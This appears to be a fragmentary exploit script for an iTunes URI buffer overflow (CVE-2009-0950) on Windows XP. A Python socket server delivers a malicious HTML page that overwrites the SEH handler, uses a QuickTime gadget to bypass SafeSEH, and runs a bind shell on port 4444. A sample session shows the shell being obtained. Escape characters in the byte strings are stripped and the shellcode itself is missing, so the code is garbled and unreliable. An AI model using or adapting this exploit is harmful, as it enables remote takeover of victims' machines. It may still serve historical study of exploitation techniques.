# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes,
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from:
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 4444
# Connection to 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:Program FilesMozilla Firefox>
<head><title>iTunes loading . . .</title>
function openiTunes(){document.location.assign("itms://itunes.apple.com/");}
function prepareStack(){document.location.assign("%s");}
function ownSeh(){document.location.assign("%s");}
// Increase this timeout if your iTunes takes more time to load!
<b>iTunes URI Bof Exploit Windows Version CVE-2009-0950</b>
<p align="center"><b>ryujin __ A-T __ offensive-security.com</b></p>
<p align="center"><b>www.offensive-security.com</b></p>
iTunes starting... wait for 20 secs; if you get an error, click "Ok"
in the MessageBox before checking for your shell on port 4444 :)<br/>
If victim host is not connected to the internet, exploit will fail
unless iTunes is already opened and you disable "openiTunes" javascript
<b><u>This exploit works if opened from Firefox not from IE!</u></b>
After exploitation iTunes crashes, you need to kill it from TaskManager
# Alpha2 ASCII printable Shellcode 730 Bytes, via EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode is modified
# in order to obtain register alignment and to reset ESP and EBP we mangled
# before. Rest of decoded shellcode is Metasploit bind shell on port 4444
# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t
align = "x61"*45 + "x54x5A" + "x42"*6 + "V"*10
# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
# Let the dance begin... Point EBP to encoded jmp
align_for_jmp = "x61x45x45x45" + ret + "x44" + "x45"*7
# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1 = "itms://:" + "x41"*200 + "/"
url2 = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +
align_for_jmp + jmp_back + pad0x3
payload = html % (url1, url2)
print "[+] [iTunes URI Bof Exploit Windows Version CVE-2009-0950](/blog/apple-itunes-81110-itms-itcp-remote-buffer-overflow-exploit-win)"
print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com"
print "[+] www.offensive-security.com"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
print "[+] Listening on port 80"
print "[+] Connection accepted from: %s" % (addr[0])
print "[+] Payload sent, wait 20 secs for iTunes error!"